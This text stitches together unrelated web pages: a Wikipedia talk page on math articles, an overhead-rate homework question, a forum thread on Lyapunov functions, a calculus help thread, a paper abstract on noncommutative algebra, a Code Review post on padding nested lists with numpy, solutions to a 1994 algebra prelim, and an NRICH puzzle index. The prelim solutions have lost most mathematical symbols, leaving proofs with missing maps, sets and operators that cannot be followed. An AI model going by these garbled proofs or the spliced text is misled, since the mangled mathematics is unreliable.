(allegedly) educational publisher that says that 1/0 = 0, 2/0 = 0, etc., perhaps it will interest you to know that at this web site where the chart is sold, the publisher now solicits opinions of the product. You can go there and tell them what you think. Michael Hardy 20:58, 9 November 2006 (UTC) Thanks, Michael --Trovatore 21:01, 9 November 2006 (UTC) ## About Category:Redirects from alternate names Hi, Mike. Concerning the message you left me I will not recreate this category. By the way, you hold a PhD in mathematics, mathematics is one of my favourite subjects. I was very glad to know that Wikipedia has about 15 000 articles about mathematics which is more than the articles in Mathworld. --Meno25 17:35, 10 November 2006 (UTC) Thanks, Meno. Are you getting your degree in math? --Trovatore 04:59, 11 November 2006 (UTC) • Sure I will try, but in Egypt where I live, I am still young for this. --Meno25 02:29, 14 November 2006 (UTC) ## Winning strategy Do you have a citation from a game theory text that this is within the scope of game theory rather than combinatorial game theory? I checked the usual suspects (Osborne & Rubinstein, Gibbons, Tirole & Fudenberg) and can't find it. ~ trialsanderrors 19:46, 14 November 2006 (UTC) I have no idea. It's a bit of a problematic article. It already existed when I started working on determinacy, and it was interfering with the more technical definition (though of the same idea) that I wanted to make there. But it's definitely not combinatorial game theory. Maybe it's not ordinary game theory either. I think it's more "theory of real-world two-player perfect-information games". --Trovatore 20:15, 14 November 2006 (UTC) Ok, I brought it up at User talk:Trialsanderrors/SCIENCE#Test case: Winning strategy. ~ trialsanderrors 20:33, 14 November 2006 (UTC) The article appears to me to be correct. It is just stated in a more general and less mathematical way than in Determinacy. Also, I do not think that it is limited to two-person games nor to perfect-information games. JRSpriggs 09:53, 15 November 2006 (UTC) Yeah, there's nothing really wrong with the article; it just doesn't fit neatly into the larger scheme of things. In what context is it trying to explain winning strategies? Barnaby Dawson wrote it, I think, to support axiom of determinacy, but it isn't well-suited for that purpose in my opinion. The first time a person sees this notion, if it's described in terms of real-world board games like chess, he's likely to be thinking too much of algorithmic strategies. Charles Matthews did some rewriting of the article under the assumption that it was about real-world games (he's a rather well-known go player, I think) and it didn't really fit with the way strategies are usually described in determinacy theory. So I put a definition inline in determinacy, possibly too terse, but more narrowly tailored to the subject, and put the pseudo-dabline at the top of winning strategy. I don't know what the best global solution is. --Trovatore 17:20, 15 November 2006 (UTC) Why not just make winning strategy into a disambiguation page? This solution appears to have worked for random number, another article that was vaguely related to many topics but not really about any one of them. CMummert 17:31, 15 November 2006 (UTC) ## Re: Hydrogen carbonate As I mentioned in my reference desk post, which I assume you already saw, I would like to see sources for this usage you propose. Though I can easily find references to hydrogen chloride, hydrogen sulfate, hydrogen phosphate, and so on referring to the compounds, I cannot find any reference to hydrogen carbonate referring to H2CO3, nor does it match what I was taught (I was a chemistry major back in college). I did not mean to imply that I thought the term was logical or preferable. — Knowledge Seeker 06:36, 17 November 2006 (UTC) ## Romano Prodi Just to let you note that an IP address has put back the infamous KGB allegations sections. Curiously, it is one of the same IP addresses as before. --Angelo 17:54, 17 November 2006 (UTC) Just a quick not imploring you not to revert again, I don't want to see you being blocked for a 3RR. Kind Regards - Heligoland | Talk | Contribs 16:58, 22 November 2006 (UTC) Thanks for the note. Actually I could revert another time without violating the letter of the law, but I won't today. Others can take it up. To tell the truth I'd be less inclined to fight the addition of the material if it had been added by someone with an established username under which he continued to edit. For most purposes we can say anon editors are equal to those who give their names, but when it comes to controversial edits, I don't think we should be forced to give equal weight to ghosts. --Trovatore 17:07, 22 November 2006 (UTC) According to Wikipedia:Biographies of living persons, the WP:3RR does not apply to removing unverified derogatory claims about a living person. "In cases where the information is derogatory and poorly sourced or unsourced, this kind of edit is an exception to the three-revert rule." JRSpriggs 07:02, 23 November 2006 (UTC) ## Ultrafilter explained through hyperreal numbers as a motivating example I am sorry if I have spoiled the Ultrafilter article. I thought my contribution to serve as a good motivating example. Shall I begin to amend it, or shall I revert it entirely (e.g. because of being out-of-place etc.)? Thank You for Your attention. Physis 16:39, 19 November 2006 (UTC) Hm? Why do you think you've spoiled it? In one edit summary I said I hadn't read it yet, which I still haven't. I probably shouldn't even have mentioned that. --Trovatore 18:35, 19 November 2006 (UTC) Thank You for the quick answer! Best wishes, Physis 19:22, 19 November 2006 (UTC) ## von Neumann Care to explain why the lowercase tag is innapropriate to articles that begin with "von Neumann"? None of the articles use "Von Neumann" in the body of the text. - Stormwatch 15:30, 24 November 2006 (UTC) The WP capitalization convention is to start article titles with a capital letter. In a few cases this does violence to the meaning of the phrase. A good example is e (mathematical constant). It is rendered "E" in the article title, but the constant is never called "E", and if that were used in print, people simply would not understand what you mean. There is no such problem with "von Neumann". Von Neumann's name does sometimes use a capital "V", namely when it starts a sentence (as, for example, in this sentence). So it's not true to say that the title is incorrect; since the V is the first letter of the title, by WP capitalization conventions, the capital V is correct. --Trovatore 19:01, 24 November 2006 (UTC) So you couldn't move omega-consistent theory because you didn't want to go through a simple formality, and instead I had to go through the trouble ;) I hope you feel a bit guilty now, and that you'll willing to give #Reconsider adminship? another thought. I assume you finished your moving house, so: would you accept a nomination to become administrator? Per favore? -- Jitse Niesen (talk) 08:46, 25 November 2006 (UTC) ## Wikipedia:Articles for deletion/Alexander Litvinenko assassination May I suggest that you speedily close Wikipedia:Articles for deletion/Alexander Litvinenko assassination. This article has thousands of edits in its edit history, so deleting is not an option. You are of course free to revert the move and split, if you feel so (or suggest it). -- Petri Krohn 02:05, 4 December 2006 (UTC) The article in now on Main page, so this is urgent. --Petri Krohn 02:16, 4 December 2006 (UTC) I misapprehended what had happened, for which I apologize. But IMHO you shouldn't have moved in the first place; you should have created a new article to move the content. The edit history belongs with the bio, not with the article about the poisoning, and there's now no easy and clean way to get things back to where they should be. --Trovatore 06:51, 4 December 2006 (UTC) Actually it now seems to be back where it should be. And by the histories, this happened hours ago, whereas it didn't seem to be true when I checked half an hour ago. I really don't understand quite what has happened here. --Trovatore 07:10, 4 December 2006 (UTC)
# Westan Corporation uses a predetermined overhead rate of $23.10 1 answer below » Westan Corporation uses a predetermined overhead rate of$23.10 per direct labor-hour. This predetermined rate was based on 12,000 estimated direct labor-hours and $277,200 of estimated total manufacturing overhead. The company incurred actual total manufacturing overhead costs of$266,000 and 12,600 total direct labor-hours during the period. Required: Determine the amount of manufacturing overhead that would have been applied to units of product during the period. Gaurav D The amount of manufacturing overhead that would have been applied to units of product during the period should be computed by multiplying the predetermined overhead rate by the number of direct labor--hours worked during the period.... ## Plagiarism Checker Submit your documents and get free Plagiarism report Free Plagiarism Checker ## Recent Questions in Cost Management Looking for Something Else? Ask a Similar Question
#### Howdy, Stranger! It looks like you're new here. If you want to get involved, click one of these buttons! Options # Blog articles on stochastic methods I've been soliciting blog articles, and they're starting to come in! Here are some on stochastic methods which we can expect to see soon: I should be editing the first of these today! In fact I should be doing it right now! It will be the next article on the blog, that's for sure. Taken together, these two should give a nice introduction to new work on evolutionary game theory with a strong emphasis on relative entropy and information geometry. One thing I want to explain clearly is how relative entropy can serve as a Lyapunov function for evolutionary games. This includes answering "what the @#!% is a Lyapunov function and why the &#%@ should I care???" The overall goal is applying robust concepts like entropy to better understand the behavior of biological and ecological systems. This post will explain a very interesting entropy-related Lyapunov function for certain chemical reaction networks. It's almost done, but it needs some editing and it still needs pictures. Again, the overall goal is to apply entropy to better understand living systems. And since some evolutionary games can be reinterpreted as chemical reaction networks, this post should be closely related to what Marc is doing! But there's some mental work to make the connection — for me, at least. It should be really cool when it all fits together! Very roughly, this is about a method for determining which economic scenarios are more likely. The likely scenarios get fed into things like the IPCC climate models, so this is important. I met Vanessa Schweizer at that workshop on What is climate change and what to do about it?, and she suggested that I could help her and Alastair and Matteo Smerlak work on this topic. That sounded really interesting, so I solicited some blog articles to prime the pump! Since this stuff is stochastic, it may be related to the other posts above. I don't know how related it is. Matteo should have some opinions on that. ## Comments • Options 1. This includes answering “what the @#!% is a Lyapunov function and why the &#%@ should I care???” I'm glad that Lyapunov functions are quite central to to Marc's and Manoj's blogs, since they were the only thing I did sort of understand beforehand! I think I'd start an explanation with a ball rolling around in a bowl. Add some syrup to stop the the ball having enough kinetic energy to worry about. Then the gravitational potential (or just the height) of the ball can serve as a Lyapunov function. Without the syrup, things become more complicated, but at least you expect the potential plus kinetic energy of the ball to monotonically decrease. Without the bowl, who knows where the ball might go. It seems quite intuitive that: 1. Lyapunov functions are great things if you can get them because they give a guide to the global properties of the system. 2. You don't expect to find them in general, and even when one exists, it may be difficult to find. 3. Free energy or entropy, or analogues, are a good place to start looking. Comment Source:> This includes answering “what the @#!% is a Lyapunov function and why the &#%@ should I care???” I'm glad that Lyapunov functions are quite central to to Marc's and Manoj's blogs, since they were the only thing I did sort of understand beforehand! I think I'd start an explanation with a ball rolling around in a bowl. Add some syrup to stop the the ball having enough kinetic energy to worry about. Then the gravitational potential (or just the height) of the ball can serve as a Lyapunov function. Without the syrup, things become more complicated, but at least you expect the potential plus kinetic energy of the ball to monotonically decrease. Without the bowl, who knows where the ball might go. It seems quite intuitive that: 1. Lyapunov functions are great things if you can get them because they give a guide to the global properties of the system. 2. You don't expect to find them in general, and even when one exists, it may be difficult to find. 3. Free energy or entropy, or analogues, are a good place to start looking. • Options 2. edited December 2013 Graham: you might check out my edited version of Marc Harper's post on relative entropy in evolutionary dynamics. You'll be glad to know that even before reading your comment, I greatly expanded the discussion of Lyapunov functions and started talking about balls rolling down hills. I did not talk about the need for syrup, nor did I mention that free energy or entropy are good places to start looking for such functions. Before, in parts 9-13 of the information geometry series, I explained how relative entropy being a Lyapunov function for evolutionary dynamics is connected to the 2nd law of thermodynamics. However, it's probably worth another mention! The issue of needing lots of friction to get our "rolling ball" intuition to apply to first-order differential equations is extremely important, but I'm not sure this blog article is the place for it. Comment Source:Graham: you might check out my edited version of Marc Harper's post on [[Blog - relative entropy in evolutionary dynamics|relative entropy in evolutionary dynamics]]. You'll be glad to know that even before reading your comment, I greatly expanded the discussion of Lyapunov functions and started talking about balls rolling down hills. I did not talk about the need for syrup, nor did I mention that free energy or entropy are good places to start looking for such functions. Before, in parts 9-13 of the [information geometry series](http://math.ucr.edu/home/baez/information/information_geometry_9.html), I explained how relative entropy being a Lyapunov function for evolutionary dynamics is connected to the 2nd law of thermodynamics. However, it's probably worth another mention! The issue of needing lots of friction to get our "rolling ball" intuition to apply to _first-order_ differential equations is extremely important, but I'm not sure this blog article is the place for it. Sign In or Register to comment.
# Derivatives Calculus Help 1. Apr 16, 2013 ### Dustobusto 1. The problem statement, all variables and given/known data Let f(x) = 2x2 -3x -5. Show that the slope of the secant line through (2, f(2)) and (2+h, f(2+h)) is 2h + 5. Then use this formula to compute the slope of : (a) The secant line through (2, f(2)), and (3, f(3)) (b) The tangent line at x = 2 (by taking a limit) 2. Relevant equations too many to count 3. The attempt at a solution Ok, so the first part I can do. I do f(x) - f(a) over x - a. In this case, for the numerator you plug 2+h into all of the x's in the f(x) formula given, and 2 into a, and then the denominator is x - a or in this case, (2+h) - 2 which = h. Factor it out, simplify, you get 2h + 5. My question is, once I have this, is part (a) asking me to solve using 2h + 5? I'm not sure how I would go about this. And part b, if its also asking me to solve using 2h + 5, then my GUESS would be: the limit of (2h + 5) as x approaches 2 = 9 ,because you would just plug 2 into h. Edit: Okay so.. P = (a, f(a) and Q = (x, f(x) so then for (2, f(2)), and (3, f(3)) a would be 2 and x would be 3. In the book it says that h = x - a. So if we plug that into 2h + 5 we get 2(3-2) + 5 and that = 7. Likewise, if we just plug 3 and 2 into the formula f(x)-f(a) over x - a, we get 7/1. So that answer must be right. I think I'm on to something here... Last edited: Apr 16, 2013 2. Apr 16, 2013 ### rock.freak667 f'(a) is defined as the limit as h→0 of [f(a+h)-f(a)]/h So far you have calculated [f(2+h)-f(2)]/h = 2h+5 so as h→0, what does 2h+5 go to? 3. Apr 16, 2013 ### Dustobusto I see. So f'(a) = lim of 2h+5 as h → 0 would be 5. i.e. the derivative is 5. right? 4. Apr 16, 2013 ### Dick Yes, the derivative is 5.
PL EN Preferencje Język Widoczny [Schowaj] Abstrakt Liczba wyników Czasopismo ## Banach Center Publications 2011 | 93 | 1 | 69-82 Tytuł artykułu ### Geometry of noncommutative algebras Autorzy Treść / Zawartość Warianty tytułu Języki publikacji EN Abstrakty EN There has been several attempts to generalize commutative algebraic geometry to the noncommutative situation. Localizations with good properties rarely exist for noncommutative algebras, and this makes a direct generalization difficult. Our point of view, following Laudal, is that the points of the noncommutative geometry should be represented as simple modules, and that noncommutative deformations should be used to obtain a suitable localization in the noncommutative situation. Let A be an algebra over an algebraically closed field k. If A is commutative and finitely generated over k, then any simple A-module has the form M = A/𝔪, the residue field, for a maximal ideal 𝔪 ⊆ A, and the commutative deformation functor $𝖣𝖾𝖿_{M}$ has formal moduli $Â_{𝔪}$. In the general case, we may replace the A-module A/𝔪 with the simple A-module M, and use the formal moduli of the commutative deformation functor $𝖣𝖾𝖿_{M}$ as a replacement for the complete local ring $Â_{𝔪}$. We recall the construction of the commutative scheme simp(A), with points in bijective correspondence with the simple A-modules of finite dimension over k, and with complete local ring at a point M isomorphic to the formal moduli of the corresponding simple module M. The scheme simp(A) has good properties, in particular when there are no infinitesimal relations between different points, i.e. when $Ext¹_{A}(M,M') = 0$ for all pairs of non-isomorphic simple A-modules M,M'. It does not, however, characterize A. We use noncommutative deformation theory to define localizations, in general. We consider the quantum plane, given by A = k⟨x,y⟩/(xy-qyx), as an example. This is an Artin-Schelter algebra of dimension two. Słowa kluczowe Kategorie tematyczne Czasopismo Rocznik Tom Numer Strony 69-82 Opis fizyczny Daty wydano 2011 Twórcy autor • BI Norwegian Business School, N-0442 Oslo, Norway autor • Buskerud University College, P.O. Box 235, N-3603 Kongsberg, Norway Bibliografia Typ dokumentu Bibliografia Identyfikatory
# Pad a ragged multidimensional array to rectangular shape For some machine learning purpose, I need to work with sequences with different lengths. To be able to process efficiently those sequences, I need to process them in batches of size size_batch. A batch typically has 4 dimensions and I want to convert it to a numpy's ndarray with 4 dimensions. For each sequence, I need to pad with some defined pad_value such that each element has the same size: the maximal size. For example, with 3 dimensional input: [[[0, 1, 2], [3], [4, 5]], [[6]], [[7, 8], [9]]] desired output for pad_value -1 is: [[[0, 1, 2], [3, -1, -1], [4, 5, -1]], [[6, -1, -1], [-1, -1, -1], [-1, -1, -1]] [[7, 8, -1], [9, -1, -1], [-1, -1, -1]]] which has shape (3, 3, 3). For this problem, one can assume that there are no empty lists in the input. Here is the solution I came up with: import numpy as np import itertools as it from typing import List """ Pads a nested list to the max shape and fill empty values with pad_value :param array: high dimensional list to be padded :param dtype: type of the output :return: padded copy of param array """ # Get max shape def get_max_shape(arr, ax=0, dims=[]): try: if ax >= len(dims): dims.append(len(arr)) else: dims[ax] = max(dims[ax], len(arr)) for i in arr: get_max_shape(i, ax+1, dims) except TypeError: # On non iterable / lengthless objects (leaves) pass return dims dims = get_max_shape(array) def get_item(arr, idx): while True: i, *idx = idx arr = arr[i] if not idx: break return arr r = np.zeros(dims, dtype=dtype) + pad_value for idx in it.product(*map(range, dims)): # idx run though all possible tuple of indices that might # contain a value in array try: r[idx] = get_item(array, idx) except IndexError: continue return r It does not feel really pythonic but does the job. Is there any better way to do it I should know ? I think I might be able to improve its speed by doing smart breaks in the last loop but I haven't dug much yet. • Maybe you should have more descriptive variable names... – Justin Jun 20 at 15:09 • Stackoverflow has lots of array pad questions, and clever answers. Most common case is padding 1d lists to form a 2d array. itertools.zip_longest is a handy tool for that, though not the fastest. – hpaulj Jun 20 at 18:07 # nested methods Why do you nest the get_max_shape etcetera in the pad? There is no need to do this. # get_max_shape Here you use recursion and a global variable. A simpler way would be to have a generator that recursively runs through the array, and yields the level and length of that part, and then another function to aggregate this results. That way you can avoid passing def get_dimensions(array, level=0): yield level, len(array) try: for row in array: yield from get_dimensions(row, level + 1) except TypeError: #not an iterable pass [(0, 3), (1, 3), (2, 3), (2, 1), (2, 2), (1, 1), (2, 1), (1, 2), (2, 2), (2, 1)] The aggregation can be very simple using collections.defaultdict: def get_max_shape(array): dimensions = defaultdict(int) for level, length in get_dimensions(array): dimensions[level] = max(dimensions[level], length) return [value for _, value in sorted(dimensions.items())] [3, 3, 3] # creating the result Instead of r = np.zeros(dims, dtype=dtype) + pad_value you can use np.full You iterate over all possible indices, and check whether it is present in the original array. Depening on how "full" the original array is, this can save some time. It also allows you to do this without your custom get_item method to get the element at the nested index def iterate_nested_array(array, index=()): try: for idx, row in enumerate(array): yield from iterate_nested_array(row, (*index, idx)) except TypeError: # final level for idx, item in enumerate(array): yield (*index, idx), item [((0, 0, 0), 0), ((0, 0, 1), 1), ((0, 0, 2), 2), ((0, 1, 0), 3), ((0, 2, 0), 4), ((0, 2, 1), 5), ((1, 0, 0), 6), ((2, 0, 0), 7), ((2, 0, 1), 8), ((2, 1, 0), 9)] ## slice an even better way, as suggested by@hpaulj uses slices: def iterate_nested_array(array, index=()): try: for idx, row in enumerate(array): yield from iterate_nested_array(row, (*index, idx)) except TypeError: # final level yield (*index, slice(len(array))), array [((0, 0, slice(None, 3, None)), [0, 1, 2]), ((0, 1, slice(None, 1, None)), [3]), ((0, 2, slice(None, 2, None)), [4, 5]), ((1, 0, slice(None, 1, None)), [6]), ((2, 0, slice(None, 2, None)), [7, 8]), ((2, 1, slice(None, 1, None)), [9])] def pad(array, fill_value): dimensions = get_max_shape(array) result = np.full(dimensions, fill_value) for index, value in iterate_nested_array(array): result[index] = value return result array([[[ 0, 1, 2], [ 3, -1, -1], [ 4, 5, -1]], [[ 6, -1, -1], [-1, -1, -1], [-1, -1, -1]], [[ 7, 8, -1], [ 9, -1, -1], [-1, -1, -1]]]) • I really should use yield more often ! it's a nice trick to save memory and enhance efficiency. – pLOPeGG Jun 20 at 15:10 • You could save some time by assigning a whole slice on the last dimension: result[i,j,:len(row)] = row, but that requires 2 hard coded levels of looping, rather than your flexible recursive iteration. – hpaulj Jun 24 at 3:38 • brilliant suggestion. You don't need a second for-loop for that, just a small adjustment to iterate_nested_array. Dynamic typing can lead to such simple code – Maarten Fabré Jun 24 at 6:33
Spring 1994 Algebra Prelim Solutions 1. Suppose G is a simple group with exactly three elements of order two. Consider the conjugation action of G on the three elements of order two: specifically if g G and x is an element of order two, then we define g x = gxg-1. This action yields a homomorphism : GS3. Suppose ker = G. Then gxg-1 = x for all g G and for all elements x of order two. Thus if x is an element of order two, we see that x is in the center of G and hence G is not simple. On the other hand if ker G, then since G is simple we must have ker = 1 and it follows that G is isomorphic to a subgroup of S3. The only subgroup of S3 which has exactly three elements of order two is S3 itself. But S3 is not simple (because A3 is a nontrivial normal subgroup), hence G is not simple and the result is proven. 2. Let F denote the free group on generators x, y, and define a homomorphism f : FS3 by f (x) = (123) and f (y) = (12). Since f (x6) = (123)6 = e, f (y4) = (12)4 = e, and f (yxy-1) = (213) = x-1, we see that f induces a homomorphism from G to S3. This homomorphism is onto because its image contains f (x) = (123) and f (y) = (12), and the elements (123), (12) generate G. Thus G has a homomorphic image isomorphic to S3. We prove that G is not isomorphic to S3 by showing it has an element whose order is a multiple of 4 or , which will establish the result because the orders of elements in S3 are 1,2 and 3. We shall use bars to denote the image of a number in /4 . Thus is the identity of /4 under the operation of addition. Define h : F/4 by h(x) = and h(y) = . Since h(x6) = 6* = , h(y4) = 4* , and h(yxy-1) = + - = = h(x-1), we see that h induces a homomorphism from G to /4 , which has in its image. Since has order 4, it follows that G has an element whose order is either a multiple of 4 or infinity. This completes the proof. 3. (i) Since R is not a field, we may choose 0s R such that s is not a unit, equivalently sRR. Define f : RR by f (r) = sr. Then f is an R-module homomorphism which is injective, because R is a PID and s 0, and is not onto because s is not a unit. This proves that R is isomorphic to the proper submodule sR of R. (ii) Using the fundamental structure theorem for finitely generated modules over a PID, we may write M as a direct sum of cyclic R-modules. Since M is not a torsion module, at least one of these summands must be R; in other words we may write M R N for some R-submodule N of M. Then M sR N and since sR N is a proper submodule of R N, we have proven that M is isomorphic to a proper submodule of itself. 4. (i) We will write mappings on the left. Let : BB C, : CB C denote the natural injections (so b = (b, 0)), and let : B CB, : B CC denote the natural epimorphisms (so (b, c) = b). Define : HomR(A, B C)HomR(A, B) HomR(A, C) by (f )= (f,f ), and : HomR(A, B) HomR(A, C)HomR(A, B C) by (f, g) = f + g. It is easily checked that and are R-module homomorphisms, so will suffice to prove that and are the identity maps. We have (f, g) = (f + g) = ((f + g),(f + g)) = (f, g) because , are the zero maps, and , are the identity maps. Therefore is the identity map. Also (h) = (h,h) = h + h = ( + )h = h because + is the identity map. Thus is the identity map and (i) is proven. (ii) Write HomR(A, A) = X. If HomR(A, A A) , then by the first part we would have X X . Thus X 0, and we see that is the direct sum of two nonzero groups. This is not possible and the result follows. 5. (i) Let I be an ideal of S-1R. We need to prove that I is finitely generated. Let J = {r R | r/1 S-1I} (where we view S-1R as elements of the form r/s where r R and s S). Then J is an ideal of R and since R is Noetherian, there exist elements x1,..., xn which generate J as an ideal, which means J = x1R + ... + xnR. We claim that I is generated by {x1/1,..., xn/1} . Indeed if r/s I, then r = r1x1 + ... + rnxn for some ri R, and hence r/s = r1/s x1 + ... + rn/s xn. This proves (i). (ii) Let S be the multiplicative subset {1, X, X2,...} . Then every element of S is invertible in R[[X, X-1]] and hence the identity map R[[X]]R[[X]] extends to a homomorphism S-1R[[X]]R[[X, X-1]]. It is easily checked that this map is an isomorphism. Since R[[X]] is Noetherian, it follows from (i) that S-1R[[X]] is Noetherian and hence R[[X, X-1]] is Noetherian as required. 6. (i) Set Y = X - 1. Then X4 + X3 + X2 + X + 1 = (X5 - 1)/(X - 1) = ((Y + 1)5 - 1)/Y = (Y5 + 5Y4 + 10Y3 + 10Y2 + 5Y)/Y = Y4 + 5Y3 + 10Y2 + 10Y + 5. Applying Eisenstein's criterion for the prime 5, we see that Y4 + 5Y3 + 10Y2 + 10Y + 5 is irreducible in [Y]. Since Y Y + 1 induces an automorphism of [Y], we deduce that X4 + X3 + X2 + X + 1 is irreducible. (ii) Let c(X) denote the characteristic polynomial of A, and let m(X) denote the minimum polynomial of A. Since A5 = I, we see that m(X) divides X5 - 1, and since 1 is not an eigenvalue of A, we see that X - 1 does not divide m(X). Therefore m(X) divides X4 + X3 + X2 + X + 1 and using (i), we deduce that the only irreducible factor of m(X) is X4 + X3 + X2 + X + 1. It follows that the only irreducible factor of c(X) is X4 + X3 + X2 + X + 1, which shows that the degree of c(X) is a multiple of 4. This completes the proof, because n is the degree of c(X). Peter Linnell 1998-07-09
# Search by Topic #### Resources tagged with Working systematically similar to Terminology: Filter by: Content type: Stage: Challenge level: ### There are 131 results Broad Topics > Using, Applying and Reasoning about Mathematics > Working systematically ### Sticky Numbers ##### Stage: 3 Challenge Level: Can you arrange the numbers 1 to 17 in a row so that each adjacent pair adds up to a square number? ### Plum Tree ##### Stage: 4 and 5 Challenge Level: Label this plum tree graph to make it totally magic! ### Consecutive Numbers ##### Stage: 2 and 3 Challenge Level: An investigation involving adding and subtracting sets of consecutive numbers. Lots to find out, lots to explore. ### 9 Weights ##### Stage: 3 Challenge Level: You have been given nine weights, one of which is slightly heavier than the rest. Can you work out which weight is heavier in just two weighings of the balance? ### Maths Trails ##### Stage: 2 and 3 The NRICH team are always looking for new ways to engage teachers and pupils in problem solving. Here we explain the thinking behind maths trails. ### You Owe Me Five Farthings, Say the Bells of St Martin's ##### Stage: 3 Challenge Level: Use the interactivity to listen to the bells ringing a pattern. Now it's your turn! Play one of the bells yourself. How do you know when it is your turn to ring? ### Product Sudoku ##### Stage: 3, 4 and 5 Challenge Level: The clues for this Sudoku are the product of the numbers in adjacent squares. ### Special Numbers ##### Stage: 3 Challenge Level: My two digit number is special because adding the sum of its digits to the product of its digits gives me my original number. What could my number be? ### Magic W ##### Stage: 4 Challenge Level: Find all the ways of placing the numbers 1 to 9 on a W shape, with 3 numbers on each leg, so that each set of 3 numbers has the same total. ### Tea Cups ##### Stage: 2 and 3 Challenge Level: Place the 16 different combinations of cup/saucer in this 4 by 4 arrangement so that no row or column contains more than one cup or saucer of the same colour. ### Weights ##### Stage: 3 Challenge Level: Different combinations of the weights available allow you to make different totals. Which totals can you make? ### LOGO Challenge - Triangles-squares-stars ##### Stage: 3 and 4 Challenge Level: Can you recreate these designs? What are the basic units? What movement is required between each unit? Some elegant use of procedures will help - variables not essential. ### Problem Solving, Using and Applying and Functional Mathematics ##### Stage: 1, 2, 3, 4 and 5 Challenge Level: Problem solving is at the heart of the NRICH site. All the problems give learners opportunities to learn, develop or use mathematical concepts and skills. Read here for more information. ### Triangles to Tetrahedra ##### Stage: 3 Challenge Level: Starting with four different triangles, imagine you have an unlimited number of each type. How many different tetrahedra can you make? Convince us you have found them all. ### More Magic Potting Sheds ##### Stage: 3 Challenge Level: The number of plants in Mr McGregor's magic potting shed increases overnight. He'd like to put the same number of plants in each of his gardens, planting one garden each day. How can he do it? ### Oranges and Lemons, Say the Bells of St Clement's ##### Stage: 3 Challenge Level: Bellringers have a special way to write down the patterns they ring. Learn about these patterns and draw some of your own. ### LOGO Challenge - Pentagram Pylons ##### Stage: 3, 4 and 5 Challenge Level: Pentagram Pylons - can you elegantly recreate them? Or, the European flag in LOGO - what poses the greater problem? ### LOGO Challenge - Following On ##### Stage: 3, 4 and 5 Challenge Level: Remember that you want someone following behind you to see where you went. Can yo work out how these patterns were created and recreate them? ##### Stage: 3, 4 and 5 Challenge Level: You need to find the values of the stars before you can apply normal Sudoku rules. ### Counting on Letters ##### Stage: 3 Challenge Level: The letters of the word ABACUS have been arranged in the shape of a triangle. How many different ways can you find to read the word ABACUS from this triangular pattern? ### LOGO Challenge - Sequences and Pentagrams ##### Stage: 3, 4 and 5 Challenge Level: Explore this how this program produces the sequences it does. What are you controlling when you change the values of the variables? ### Advent Calendar 2011 - Secondary ##### Stage: 3, 4 and 5 Challenge Level: Advent Calendar 2011 - a mathematical activity for each day during the run-up to Christmas. ### A Long Time at the Till ##### Stage: 4 and 5 Challenge Level: Try to solve this very difficult problem and then study our two suggested solutions. How would you use your knowledge to try to solve variants on the original problem? ### Where Can We Visit? ##### Stage: 3 Challenge Level: Charlie and Abi put a counter on 42. They wondered if they could visit all the other numbers on their 1-100 board, moving the counter using just these two operations: x2 and -5. What do you think? ### More Children and Plants ##### Stage: 2 and 3 Challenge Level: This challenge extends the Plants investigation so now four or more children are involved. ### More Plant Spaces ##### Stage: 2 and 3 Challenge Level: This challenging activity involves finding different ways to distribute fifteen items among four sets, when the sets must include three, four, five and six items. ### Building with Longer Rods ##### Stage: 2 and 3 Challenge Level: A challenging activity focusing on finding all possible ways of stacking rods. ### Crossing the Town Square ##### Stage: 2 and 3 Challenge Level: This tricky challenge asks you to find ways of going across rectangles, going through exactly ten squares. ### Making Maths: Double-sided Magic Square ##### Stage: 2 and 3 Challenge Level: Make your own double-sided magic square. But can you complete both sides once you've made the pieces? ### LCM Sudoku II ##### Stage: 3, 4 and 5 Challenge Level: You are given the Lowest Common Multiples of sets of digits. Find the digits and then solve the Sudoku. ### Difference Sudoku ##### Stage: 3 and 4 Challenge Level: Use the differences to find the solution to this Sudoku. ### LOGO Challenge - the Logic of LOGO ##### Stage: 3 and 4 Challenge Level: Just four procedures were used to produce a design. How was it done? Can you be systematic and elegant so that someone can follow your logic? ### Intersection Sudoku 1 ##### Stage: 3 and 4 Challenge Level: A Sudoku with a twist. ### Consecutive Negative Numbers ##### Stage: 3 Challenge Level: Do you notice anything about the solutions when you add and/or subtract consecutive negative numbers? ##### Stage: 3 and 4 Challenge Level: This is a variation of sudoku which contains a set of special clue-numbers. Each set of 4 small digits stands for the numbers in the four cells of the grid adjacent to this set. ##### Stage: 3 and 4 Challenge Level: Four numbers on an intersection that need to be placed in the surrounding cells. That is all you need to know to solve this sudoku. ### Creating Cubes ##### Stage: 2 and 3 Challenge Level: Arrange 9 red cubes, 9 blue cubes and 9 yellow cubes into a large 3 by 3 cube. No row or column of cubes must contain two cubes of the same colour. ### Summing Consecutive Numbers ##### Stage: 3 Challenge Level: Many numbers can be expressed as the sum of two or more consecutive integers. For example, 15=7+8 and 10=1+2+3+4. Can you say which numbers can be expressed in this way? ### When Will You Pay Me? Say the Bells of Old Bailey ##### Stage: 3 Challenge Level: Use the interactivity to play two of the bells in a pattern. How do you know when it is your turn to ring, and how do you know which bell to ring? ### Equation Sudoku ##### Stage: 3, 4 and 5 Challenge Level: Solve the equations to identify the clue numbers in this Sudoku problem. ### Squares in Rectangles ##### Stage: 3 Challenge Level: A 2 by 3 rectangle contains 8 squares and a 3 by 4 rectangle contains 20 squares. What size rectangle(s) contain(s) exactly 100 squares? Can you find them all? ### Intersection Sudoku 2 ##### Stage: 3 and 4 Challenge Level: A Sudoku with a twist. ### The Great Weights Puzzle ##### Stage: 4 Challenge Level: You have twelve weights, one of which is different from the rest. Using just 3 weighings, can you identify which weight is the odd one out, and whether it is heavier or lighter than the rest? ### All-variables Sudoku ##### Stage: 3, 4 and 5 Challenge Level: The challenge is to find the values of the variables if you are to solve this Sudoku. ### Medal Muddle ##### Stage: 3 Challenge Level: Countries from across the world competed in a sports tournament. Can you devise an efficient strategy to work out the order in which they finished? ### Games Related to Nim ##### Stage: 1, 2, 3 and 4 This article for teachers describes several games, found on the site, all of which have a related structure that can be used to develop the skills of strategic planning. ### Colour Islands Sudoku ##### Stage: 3 Challenge Level: An extra constraint means this Sudoku requires you to think in diagonals as well as horizontal and vertical lines and boxes of nine. ### Multiplication Equation Sudoku ##### Stage: 4 and 5 Challenge Level: The puzzle can be solved by finding the values of the unknown digits (all indicated by asterisks) in the squares of the $9\times9$ grid. ### The Naked Pair in Sudoku ##### Stage: 2, 3 and 4 A particular technique for solving Sudoku puzzles, known as "naked pair", is explained in this easy-to-read article. ### Instant Insanity ##### Stage: 3, 4 and 5 Challenge Level: Given the nets of 4 cubes with the faces coloured in 4 colours, build a tower so that on each vertical wall no colour is repeated, that is all 4 colours appear.